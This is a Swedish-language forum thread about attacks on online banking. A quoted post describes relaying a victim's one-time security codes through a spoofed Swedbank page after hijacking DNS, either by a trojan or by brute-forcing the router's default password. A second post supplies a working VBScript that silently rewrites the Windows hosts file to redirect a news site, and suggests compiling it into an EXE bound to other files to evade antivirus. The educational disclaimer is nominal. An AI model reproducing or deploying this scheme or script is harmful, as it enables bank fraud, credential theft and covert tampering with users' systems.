Citat:
Ursprungligen postat av Fonsan
det är bara göra en kopia av hemsidan och när du loggar in startar ett perl script eller liknande som loggar in med samma lösen etc
När den kod som krävs uppenbarar sig för scriptet skickar den det vidare till
webservern som printar ut samma kod till användaren
Användaren skickar vidare sin kod från dosan som scripetet använder för
att komma in. När sedan scriptet skall "skapa" ett nytt konto att flytta pengar till eller likn kan det ju använda kreativiteten och printa att du skrev in fel kod
första gången och får en ny kod som är för kontot
sedan upprepar du ovan prodedur fast med den kod som behövs för
att transaktionen skall gå igenom
det spelar ingen roll vad användaren gör under sessionen bara att
scriptet hinner få 3 st kodsvar
1. Inlogg
2. Kontot
3. Bekräfta
Alltså scriptet surfar runt på den riktiga sidan och genererar fram sidor åt
användaren som glatt ser
www.swedbank.se i fältet då dns är manipulerad i routern.
Detta är hur jag föreställer mig att attacken går till
aah just det trojanen är för att logga in på routern och ändra dns
just problemet med default lösen på routrar är ganska kritisk
och att sitta och bruteforca en är heller inte ett problem så det är det som
är svagheten i systemet.
jag tror vi kommer få se mer DNS baserade riktade attacker mot
användare närmsta tiden inte bara inom banker
Allt ovan är enbart i undervisande syfte och jag uppmanar inte till brott
Mvh
Att omdirigera en webbsidas DNS till en helt annan sida på internet är enkelt.
Tex. När man surfar till
www.aftonbladet.se så kommer man till
www.free6.com
Detta gör man genom att ändra i host filen som finns under C:\WINDOWS\system32\drivers\etc
Detta kan göras antingen manuellt eller via script.
Detta script dirigerar om
www.aftonbladet.se till 213.88.151.196 (free6.com)
Ett exempel på vbs script kan se ut så här.
Kod:
Kod:
On Error Resume Next
Const ForRead = 1 '*Opens file for reading
Const ForWriting = 2 '*Opens file for writing, overwriting file
Const ForAppend = 8 '*Opens file for Appending
strComputer = "." '* This computer
'* Connect to the WMI Service
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
'* Open the host File
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile1 = objFSO.OpenTextFile("C:\Windows\System32\Drivers\Etc\hosts", ForRead)
Set objFile2 = objFSO.CreateTextFile("C:\Windows\System32\Drivers\Etc\temphosts")
Dim boolFound
boolFound = False
Do Until objFile1.AtEndOfStream
'* Read line from input file
strLine = objFile1.ReadLine
objFile2.Writeline strLine
Loop
If boolFound = False then
objFile2.Writeline strServerIP & "213.88.151.196 www.aftonbladet.se"
End If
objFSO.Copyfile "C:\Windows\System32\Drivers\Etc\temphosts", "C:\Windows\System32\Drivers\Etc\hosts"
objFile1.Close
objFile2.Close
Vill man sen göra det ännu mer avacerat så kan man kompilera om det till en EXE fil och binda ihop den med andra filer.
I dags läget reagerar inte Antivirus program på detta.
Mer info om hostfilen hittar ni på Google